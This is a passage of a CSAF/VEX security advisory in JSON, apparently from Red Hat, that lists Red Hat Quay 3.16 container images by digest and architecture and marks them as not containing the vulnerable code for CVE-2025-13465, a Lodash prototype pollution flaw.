"purl": "pkg:oci/quay-rhel9@sha256%3A39155eb5f845ade84925b763885a363b95ba927e91e2ee76d8df304620b9ac0e?arch=amd64\u0026repository_url=registry.redhat.io/quay\u0026tag=1775069491"
}
}
}
],
"category": "architecture",
"name": "amd64"
},
{
"branches": [
{
"category": "product_version",
"name": "registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:8b059901d52536b850c65e2ed38d136b2cf831dc12af8a2eea71e584fcd49354_ppc64le",
"product": {
"name": "registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:8b059901d52536b850c65e2ed38d136b2cf831dc12af8a2eea71e584fcd49354_ppc64le",
"product_id": "registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:8b059901d52536b850c65e2ed38d136b2cf831dc12af8a2eea71e584fcd49354_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/quay-container-security-operator-rhel9@sha256%3A8b059901d52536b850c65e2ed38d136b2cf831dc12af8a2eea71e584fcd49354?arch=ppc64le\u0026repository_url=registry.redhat.io/quay\u0026tag=1773784956"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:1d28e4844da6b1bd1e2fbad161ca68494cac166b9fa22b30a558e0d8a3c9d12d_ppc64le",
"product": {
"name": "registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:1d28e4844da6b1bd1e2fbad161ca68494cac166b9fa22b30a558e0d8a3c9d12d_ppc64le",
"product_id": "registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:1d28e4844da6b1bd1e2fbad161ca68494cac166b9fa22b30a558e0d8a3c9d12d_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/quay-bridge-operator-rhel9@sha256%3A1d28e4844da6b1bd1e2fbad161ca68494cac166b9fa22b30a558e0d8a3c9d12d?arch=ppc64le\u0026repository_url=registry.redhat.io/quay\u0026tag=1773784980"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/quay/quay-builder-rhel9@sha256:342f40181bab7dcc4acdbf4d28fa314fc1dd9c9a3e9e99024e7c856f46fd8092_ppc64le",
"product": {
"name": "registry.redhat.io/quay/quay-builder-rhel9@sha256:342f40181bab7dcc4acdbf4d28fa314fc1dd9c9a3e9e99024e7c856f46fd8092_ppc64le",
"product_id": "registry.redhat.io/quay/quay-builder-rhel9@sha256:342f40181bab7dcc4acdbf4d28fa314fc1dd9c9a3e9e99024e7c856f46fd8092_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/quay-builder-rhel9@sha256%3A342f40181bab7dcc4acdbf4d28fa314fc1dd9c9a3e9e99024e7c856f46fd8092?arch=ppc64le\u0026repository_url=registry.redhat.io/quay\u0026tag=1773785008"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/quay/clair-rhel9@sha256:bbd4e466a0973195c134bc7bd406a824a5e205201559931d2975fd337b435e7c_ppc64le",
"product": {
"name": "registry.redhat.io/quay/clair-rhel9@sha256:bbd4e466a0973195c134bc7bd406a824a5e205201559931d2975fd337b435e7c_ppc64le",
"product_id": "registry.redhat.io/quay/clair-rhel9@sha256:bbd4e466a0973195c134bc7bd406a824a5e205201559931d2975fd337b435e7c_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/clair-rhel9@sha256%3Abbd4e466a0973195c134bc7bd406a824a5e205201559931d2975fd337b435e7c?arch=ppc64le\u0026repository_url=registry.redhat.io/quay\u0026tag=1773785566"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/quay/quay-operator-rhel9@sha256:d8e040decc94bdb06eda60acb11ff111221d059495c706e3dc9cc8c124ec603b_ppc64le",
"product": {
"name": "registry.redhat.io/quay/quay-operator-rhel9@sha256:d8e040decc94bdb06eda60acb11ff111221d059495c706e3dc9cc8c124ec603b_ppc64le",
"product_id": "registry.redhat.io/quay/quay-operator-rhel9@sha256:d8e040decc94bdb06eda60acb11ff111221d059495c706e3dc9cc8c124ec603b_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/quay-operator-rhel9@sha256%3Ad8e040decc94bdb06eda60acb11ff111221d059495c706e3dc9cc8c124ec603b?arch=ppc64le\u0026repository_url=registry.redhat.io/quay\u0026tag=1773784969"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/quay/quay-rhel9@sha256:3559638cc583d4a6e550d3572f9696dc488d8f75d6f7f77c9853c4881d98dd4a_ppc64le",
"product": {
"name": "registry.redhat.io/quay/quay-rhel9@sha256:3559638cc583d4a6e550d3572f9696dc488d8f75d6f7f77c9853c4881d98dd4a_ppc64le",
"product_id": "registry.redhat.io/quay/quay-rhel9@sha256:3559638cc583d4a6e550d3572f9696dc488d8f75d6f7f77c9853c4881d98dd4a_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/quay-rhel9@sha256%3A3559638cc583d4a6e550d3572f9696dc488d8f75d6f7f77c9853c4881d98dd4a?arch=ppc64le\u0026repository_url=registry.redhat.io/quay\u0026tag=1775069491"
}
}
}
],
"category": "architecture",
"name": "ppc64le"
},
{
"branches": [
{
"category": "product_version",
"name": "registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:b5e3b47f06c81244340ca599511d221efd830ff31ed15c5c3ab5ea4bbb45388f_s390x",
"product": {
"name": "registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:b5e3b47f06c81244340ca599511d221efd830ff31ed15c5c3ab5ea4bbb45388f_s390x",
"product_id": "registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:b5e3b47f06c81244340ca599511d221efd830ff31ed15c5c3ab5ea4bbb45388f_s390x",
"product_identification_helper": {
"purl": "pkg:oci/quay-container-security-operator-rhel9@sha256%3Ab5e3b47f06c81244340ca599511d221efd830ff31ed15c5c3ab5ea4bbb45388f?arch=s390x\u0026repository_url=registry.redhat.io/quay\u0026tag=1773784956"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:7b90f185ddc5973be1bc4ffd27b785debb1d519cc6c0ea400a7fbbf22dfa2375_s390x",
"product": {
"name": "registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:7b90f185ddc5973be1bc4ffd27b785debb1d519cc6c0ea400a7fbbf22dfa2375_s390x",
"product_id": "registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:7b90f185ddc5973be1bc4ffd27b785debb1d519cc6c0ea400a7fbbf22dfa2375_s390x",
"product_identification_helper": {
"purl": "pkg:oci/quay-bridge-operator-rhel9@sha256%3A7b90f185ddc5973be1bc4ffd27b785debb1d519cc6c0ea400a7fbbf22dfa2375?arch=s390x\u0026repository_url=registry.redhat.io/quay\u0026tag=1773784980"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/quay/quay-builder-rhel9@sha256:b97e1ced70d68a5ff55dca3fe7962995f7f9559e7305660bdf829cc60e6cb2bd_s390x",
"product": {
"name": "registry.redhat.io/quay/quay-builder-rhel9@sha256:b97e1ced70d68a5ff55dca3fe7962995f7f9559e7305660bdf829cc60e6cb2bd_s390x",
"product_id": "registry.redhat.io/quay/quay-builder-rhel9@sha256:b97e1ced70d68a5ff55dca3fe7962995f7f9559e7305660bdf829cc60e6cb2bd_s390x",
"product_identification_helper": {
"purl": "pkg:oci/quay-builder-rhel9@sha256%3Ab97e1ced70d68a5ff55dca3fe7962995f7f9559e7305660bdf829cc60e6cb2bd?arch=s390x\u0026repository_url=registry.redhat.io/quay\u0026tag=1773785008"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/quay/clair-rhel9@sha256:6f505834f4023e94f791769bb6726d24e8e94605ee525d4f657b38ec2810e06f_s390x",
"product": {
"name": "registry.redhat.io/quay/clair-rhel9@sha256:6f505834f4023e94f791769bb6726d24e8e94605ee525d4f657b38ec2810e06f_s390x",
"product_id": "registry.redhat.io/quay/clair-rhel9@sha256:6f505834f4023e94f791769bb6726d24e8e94605ee525d4f657b38ec2810e06f_s390x",
"product_identification_helper": {
"purl": "pkg:oci/clair-rhel9@sha256%3A6f505834f4023e94f791769bb6726d24e8e94605ee525d4f657b38ec2810e06f?arch=s390x\u0026repository_url=registry.redhat.io/quay\u0026tag=1773785566"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/quay/quay-operator-rhel9@sha256:401ad33f2305b2f3f54823135c9d25531d55936efb7d20ca1dac5b88efc71a28_s390x",
"product": {
"name": "registry.redhat.io/quay/quay-operator-rhel9@sha256:401ad33f2305b2f3f54823135c9d25531d55936efb7d20ca1dac5b88efc71a28_s390x",
"product_id": "registry.redhat.io/quay/quay-operator-rhel9@sha256:401ad33f2305b2f3f54823135c9d25531d55936efb7d20ca1dac5b88efc71a28_s390x",
"product_identification_helper": {
"purl": "pkg:oci/quay-operator-rhel9@sha256%3A401ad33f2305b2f3f54823135c9d25531d55936efb7d20ca1dac5b88efc71a28?arch=s390x\u0026repository_url=registry.redhat.io/quay\u0026tag=1773784969"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/quay/quay-rhel9@sha256:de5cfa1742d9eed1e2d7b07693559f1cf52eca41fda6cfb83d226cf3f9bafb9e_s390x",
"product": {
"name": "registry.redhat.io/quay/quay-rhel9@sha256:de5cfa1742d9eed1e2d7b07693559f1cf52eca41fda6cfb83d226cf3f9bafb9e_s390x",
"product_id": "registry.redhat.io/quay/quay-rhel9@sha256:de5cfa1742d9eed1e2d7b07693559f1cf52eca41fda6cfb83d226cf3f9bafb9e_s390x",
"product_identification_helper": {
"purl": "pkg:oci/quay-rhel9@sha256%3Ade5cfa1742d9eed1e2d7b07693559f1cf52eca41fda6cfb83d226cf3f9bafb9e?arch=s390x\u0026repository_url=registry.redhat.io/quay\u0026tag=1775069491"
}
}
}
],
"category": "architecture",
"name": "s390x"
},
{
"branches": [
{
"category": "product_version",
"name": "registry.redhat.io/quay/quay-rhel9@sha256:0bc25ef16eabd14562b5c15b2f242558ace42865d416820420d669436d9d71ae_arm64",
"product": {
"name": "registry.redhat.io/quay/quay-rhel9@sha256:0bc25ef16eabd14562b5c15b2f242558ace42865d416820420d669436d9d71ae_arm64",
"product_id": "registry.redhat.io/quay/quay-rhel9@sha256:0bc25ef16eabd14562b5c15b2f242558ace42865d416820420d669436d9d71ae_arm64",
"product_identification_helper": {
"purl": "pkg:oci/quay-rhel9@sha256%3A0bc25ef16eabd14562b5c15b2f242558ace42865d416820420d669436d9d71ae?arch=arm64\u0026repository_url=registry.redhat.io/quay\u0026tag=1775069491"
}
}
}
],
"category": "architecture",
"name": "arm64"
}
],
"category": "vendor",
"name": "Red Hat"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/quay/clair-rhel9@sha256:618838ba45069cb93c48acc40c19186a5e471d4ea17f8f057a5187e74d196a9b_amd64 as a component of Red Hat Quay 3.16",
"product_id": "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:618838ba45069cb93c48acc40c19186a5e471d4ea17f8f057a5187e74d196a9b_amd64"
},
"product_reference": "registry.redhat.io/quay/clair-rhel9@sha256:618838ba45069cb93c48acc40c19186a5e471d4ea17f8f057a5187e74d196a9b_amd64",
"relates_to_product_reference": "Red Hat Quay 3.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/quay/clair-rhel9@sha256:6f505834f4023e94f791769bb6726d24e8e94605ee525d4f657b38ec2810e06f_s390x as a component of Red Hat Quay 3.16",
"product_id": "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:6f505834f4023e94f791769bb6726d24e8e94605ee525d4f657b38ec2810e06f_s390x"
},
"product_reference": "registry.redhat.io/quay/clair-rhel9@sha256:6f505834f4023e94f791769bb6726d24e8e94605ee525d4f657b38ec2810e06f_s390x",
"relates_to_product_reference": "Red Hat Quay 3.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/quay/clair-rhel9@sha256:bbd4e466a0973195c134bc7bd406a824a5e205201559931d2975fd337b435e7c_ppc64le as a component of Red Hat Quay 3.16",
"product_id": "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:bbd4e466a0973195c134bc7bd406a824a5e205201559931d2975fd337b435e7c_ppc64le"
},
"product_reference": "registry.redhat.io/quay/clair-rhel9@sha256:bbd4e466a0973195c134bc7bd406a824a5e205201559931d2975fd337b435e7c_ppc64le",
"relates_to_product_reference": "Red Hat Quay 3.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:1ca15d4a3ec7067bb925e83588e5ac94674e77ba29969cba9137c07bafadc025_amd64 as a component of Red Hat Quay 3.16",
"product_id": "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:1ca15d4a3ec7067bb925e83588e5ac94674e77ba29969cba9137c07bafadc025_amd64"
},
"product_reference": "registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:1ca15d4a3ec7067bb925e83588e5ac94674e77ba29969cba9137c07bafadc025_amd64",
"relates_to_product_reference": "Red Hat Quay 3.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:1d28e4844da6b1bd1e2fbad161ca68494cac166b9fa22b30a558e0d8a3c9d12d_ppc64le as a component of Red Hat Quay 3.16",
"product_id": "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:1d28e4844da6b1bd1e2fbad161ca68494cac166b9fa22b30a558e0d8a3c9d12d_ppc64le"
},
"product_reference": "registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:1d28e4844da6b1bd1e2fbad161ca68494cac166b9fa22b30a558e0d8a3c9d12d_ppc64le",
"relates_to_product_reference": "Red Hat Quay 3.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:4b923525f815b87f3375bd5346f8261746d2e172f2f83b4604c558c4d7ae64ee_amd64 as a component of Red Hat Quay 3.16",
"product_id": "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:4b923525f815b87f3375bd5346f8261746d2e172f2f83b4604c558c4d7ae64ee_amd64"
},
"product_reference": "registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:4b923525f815b87f3375bd5346f8261746d2e172f2f83b4604c558c4d7ae64ee_amd64",
"relates_to_product_reference": "Red Hat Quay 3.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:7b90f185ddc5973be1bc4ffd27b785debb1d519cc6c0ea400a7fbbf22dfa2375_s390x as a component of Red Hat Quay 3.16",
"product_id": "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:7b90f185ddc5973be1bc4ffd27b785debb1d519cc6c0ea400a7fbbf22dfa2375_s390x"
},
"product_reference": "registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:7b90f185ddc5973be1bc4ffd27b785debb1d519cc6c0ea400a7fbbf22dfa2375_s390x",
"relates_to_product_reference": "Red Hat Quay 3.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:1d0b2c18a32a5e1195a65e2c6fe5c79f8acd1695a56e848302621a87e5ec041c_amd64 as a component of Red Hat Quay 3.16",
"product_id": "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:1d0b2c18a32a5e1195a65e2c6fe5c79f8acd1695a56e848302621a87e5ec041c_amd64"
},
"product_reference": "registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:1d0b2c18a32a5e1195a65e2c6fe5c79f8acd1695a56e848302621a87e5ec041c_amd64",
"relates_to_product_reference": "Red Hat Quay 3.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/quay/quay-builder-rhel9@sha256:342f40181bab7dcc4acdbf4d28fa314fc1dd9c9a3e9e99024e7c856f46fd8092_ppc64le as a component of Red Hat Quay 3.16",
"product_id": "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:342f40181bab7dcc4acdbf4d28fa314fc1dd9c9a3e9e99024e7c856f46fd8092_ppc64le"
},
"product_reference": "registry.redhat.io/quay/quay-builder-rhel9@sha256:342f40181bab7dcc4acdbf4d28fa314fc1dd9c9a3e9e99024e7c856f46fd8092_ppc64le",
"relates_to_product_reference": "Red Hat Quay 3.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/quay/quay-builder-rhel9@sha256:af9f4557f46bb29353be32e53f3c49d32d4641859a3ed385e69423a37b04fa03_amd64 as a component of Red Hat Quay 3.16",
"product_id": "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:af9f4557f46bb29353be32e53f3c49d32d4641859a3ed385e69423a37b04fa03_amd64"
},
"product_reference": "registry.redhat.io/quay/quay-builder-rhel9@sha256:af9f4557f46bb29353be32e53f3c49d32d4641859a3ed385e69423a37b04fa03_amd64",
"relates_to_product_reference": "Red Hat Quay 3.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/quay/quay-builder-rhel9@sha256:b97e1ced70d68a5ff55dca3fe7962995f7f9559e7305660bdf829cc60e6cb2bd_s390x as a component of Red Hat Quay 3.16",
"product_id": "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:b97e1ced70d68a5ff55dca3fe7962995f7f9559e7305660bdf829cc60e6cb2bd_s390x"
},
"product_reference": "registry.redhat.io/quay/quay-builder-rhel9@sha256:b97e1ced70d68a5ff55dca3fe7962995f7f9559e7305660bdf829cc60e6cb2bd_s390x",
"relates_to_product_reference": "Red Hat Quay 3.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:a48e62759aae34528989bef0e959d1e7f8eeac108e3118bbd86e909882e1b775_amd64 as a component of Red Hat Quay 3.16",
"product_id": "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:a48e62759aae34528989bef0e959d1e7f8eeac108e3118bbd86e909882e1b775_amd64"
},
"product_reference": "registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:a48e62759aae34528989bef0e959d1e7f8eeac108e3118bbd86e909882e1b775_amd64",
"relates_to_product_reference": "Red Hat Quay 3.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:8b059901d52536b850c65e2ed38d136b2cf831dc12af8a2eea71e584fcd49354_ppc64le as a component of Red Hat Quay 3.16",
"product_id": "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:8b059901d52536b850c65e2ed38d136b2cf831dc12af8a2eea71e584fcd49354_ppc64le"
},
"product_reference": "registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:8b059901d52536b850c65e2ed38d136b2cf831dc12af8a2eea71e584fcd49354_ppc64le",
"relates_to_product_reference": "Red Hat Quay 3.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:943935018ddabe868b693b6078580325ec04905fd1cf13553ef7e351427caf14_amd64 as a component of Red Hat Quay 3.16",
"product_id": "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:943935018ddabe868b693b6078580325ec04905fd1cf13553ef7e351427caf14_amd64"
},
"product_reference": "registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:943935018ddabe868b693b6078580325ec04905fd1cf13553ef7e351427caf14_amd64",
"relates_to_product_reference": "Red Hat Quay 3.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:b5e3b47f06c81244340ca599511d221efd830ff31ed15c5c3ab5ea4bbb45388f_s390x as a component of Red Hat Quay 3.16",
"product_id": "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:b5e3b47f06c81244340ca599511d221efd830ff31ed15c5c3ab5ea4bbb45388f_s390x"
},
"product_reference": "registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:b5e3b47f06c81244340ca599511d221efd830ff31ed15c5c3ab5ea4bbb45388f_s390x",
"relates_to_product_reference": "Red Hat Quay 3.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/quay/quay-operator-bundle@sha256:1ab0303614da22f6a9e3005358de62ba1079f90f2410481603eb33b5b2f7db70_amd64 as a component of Red Hat Quay 3.16",
"product_id": "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-bundle@sha256:1ab0303614da22f6a9e3005358de62ba1079f90f2410481603eb33b5b2f7db70_amd64"
},
"product_reference": "registry.redhat.io/quay/quay-operator-bundle@sha256:1ab0303614da22f6a9e3005358de62ba1079f90f2410481603eb33b5b2f7db70_amd64",
"relates_to_product_reference": "Red Hat Quay 3.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/quay/quay-operator-rhel9@sha256:401ad33f2305b2f3f54823135c9d25531d55936efb7d20ca1dac5b88efc71a28_s390x as a component of Red Hat Quay 3.16",
"product_id": "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:401ad33f2305b2f3f54823135c9d25531d55936efb7d20ca1dac5b88efc71a28_s390x"
},
"product_reference": "registry.redhat.io/quay/quay-operator-rhel9@sha256:401ad33f2305b2f3f54823135c9d25531d55936efb7d20ca1dac5b88efc71a28_s390x",
"relates_to_product_reference": "Red Hat Quay 3.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/quay/quay-operator-rhel9@sha256:7aa800901c5b9a158fe07c3a632bf95920af918f70753de3ef201d3be7684ca5_amd64 as a component of Red Hat Quay 3.16",
"product_id": "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:7aa800901c5b9a158fe07c3a632bf95920af918f70753de3ef201d3be7684ca5_amd64"
},
"product_reference": "registry.redhat.io/quay/quay-operator-rhel9@sha256:7aa800901c5b9a158fe07c3a632bf95920af918f70753de3ef201d3be7684ca5_amd64",
"relates_to_product_reference": "Red Hat Quay 3.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/quay/quay-operator-rhel9@sha256:d8e040decc94bdb06eda60acb11ff111221d059495c706e3dc9cc8c124ec603b_ppc64le as a component of Red Hat Quay 3.16",
"product_id": "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:d8e040decc94bdb06eda60acb11ff111221d059495c706e3dc9cc8c124ec603b_ppc64le"
},
"product_reference": "registry.redhat.io/quay/quay-operator-rhel9@sha256:d8e040decc94bdb06eda60acb11ff111221d059495c706e3dc9cc8c124ec603b_ppc64le",
"relates_to_product_reference": "Red Hat Quay 3.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/quay/quay-rhel9@sha256:0bc25ef16eabd14562b5c15b2f242558ace42865d416820420d669436d9d71ae_arm64 as a component of Red Hat Quay 3.16",
"product_id": "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:0bc25ef16eabd14562b5c15b2f242558ace42865d416820420d669436d9d71ae_arm64"
},
"product_reference": "registry.redhat.io/quay/quay-rhel9@sha256:0bc25ef16eabd14562b5c15b2f242558ace42865d416820420d669436d9d71ae_arm64",
"relates_to_product_reference": "Red Hat Quay 3.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/quay/quay-rhel9@sha256:3559638cc583d4a6e550d3572f9696dc488d8f75d6f7f77c9853c4881d98dd4a_ppc64le as a component of Red Hat Quay 3.16",
"product_id": "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:3559638cc583d4a6e550d3572f9696dc488d8f75d6f7f77c9853c4881d98dd4a_ppc64le"
},
"product_reference": "registry.redhat.io/quay/quay-rhel9@sha256:3559638cc583d4a6e550d3572f9696dc488d8f75d6f7f77c9853c4881d98dd4a_ppc64le",
"relates_to_product_reference": "Red Hat Quay 3.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/quay/quay-rhel9@sha256:39155eb5f845ade84925b763885a363b95ba927e91e2ee76d8df304620b9ac0e_amd64 as a component of Red Hat Quay 3.16",
"product_id": "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:39155eb5f845ade84925b763885a363b95ba927e91e2ee76d8df304620b9ac0e_amd64"
},
"product_reference": "registry.redhat.io/quay/quay-rhel9@sha256:39155eb5f845ade84925b763885a363b95ba927e91e2ee76d8df304620b9ac0e_amd64",
"relates_to_product_reference": "Red Hat Quay 3.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/quay/quay-rhel9@sha256:de5cfa1742d9eed1e2d7b07693559f1cf52eca41fda6cfb83d226cf3f9bafb9e_s390x as a component of Red Hat Quay 3.16",
"product_id": "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:de5cfa1742d9eed1e2d7b07693559f1cf52eca41fda6cfb83d226cf3f9bafb9e_s390x"
},
"product_reference": "registry.redhat.io/quay/quay-rhel9@sha256:de5cfa1742d9eed1e2d7b07693559f1cf52eca41fda6cfb83d226cf3f9bafb9e_s390x",
"relates_to_product_reference": "Red Hat Quay 3.16"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2025-13465",
"cwe": {
"id": "CWE-1321",
"name": "Improperly Controlled Modification of Object Prototype Attributes (\u0027Prototype Pollution\u0027)"
},
"discovery_date": "2026-01-21T20:01:28.774829+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:618838ba45069cb93c48acc40c19186a5e471d4ea17f8f057a5187e74d196a9b_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:6f505834f4023e94f791769bb6726d24e8e94605ee525d4f657b38ec2810e06f_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:bbd4e466a0973195c134bc7bd406a824a5e205201559931d2975fd337b435e7c_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:1ca15d4a3ec7067bb925e83588e5ac94674e77ba29969cba9137c07bafadc025_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:1d28e4844da6b1bd1e2fbad161ca68494cac166b9fa22b30a558e0d8a3c9d12d_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:4b923525f815b87f3375bd5346f8261746d2e172f2f83b4604c558c4d7ae64ee_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:7b90f185ddc5973be1bc4ffd27b785debb1d519cc6c0ea400a7fbbf22dfa2375_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:1d0b2c18a32a5e1195a65e2c6fe5c79f8acd1695a56e848302621a87e5ec041c_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:342f40181bab7dcc4acdbf4d28fa314fc1dd9c9a3e9e99024e7c856f46fd8092_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:af9f4557f46bb29353be32e53f3c49d32d4641859a3ed385e69423a37b04fa03_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:b97e1ced70d68a5ff55dca3fe7962995f7f9559e7305660bdf829cc60e6cb2bd_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:a48e62759aae34528989bef0e959d1e7f8eeac108e3118bbd86e909882e1b775_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:8b059901d52536b850c65e2ed38d136b2cf831dc12af8a2eea71e584fcd49354_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:943935018ddabe868b693b6078580325ec04905fd1cf13553ef7e351427caf14_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:b5e3b47f06c81244340ca599511d221efd830ff31ed15c5c3ab5ea4bbb45388f_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-bundle@sha256:1ab0303614da22f6a9e3005358de62ba1079f90f2410481603eb33b5b2f7db70_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:401ad33f2305b2f3f54823135c9d25531d55936efb7d20ca1dac5b88efc71a28_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:7aa800901c5b9a158fe07c3a632bf95920af918f70753de3ef201d3be7684ca5_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:d8e040decc94bdb06eda60acb11ff111221d059495c706e3dc9cc8c124ec603b_ppc64le"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2431740"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Lodash. A prototype pollution vulnerability in the _.unset and _.omit functions allows an attacker able to control property paths to delete methods from global prototypes. By removing essential functionalities, this can result in a denial of service.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "lodash: prototype pollution in _.unset and _.omit functions",
"title": "Vulnerability summary"
},
{
"category": "other",
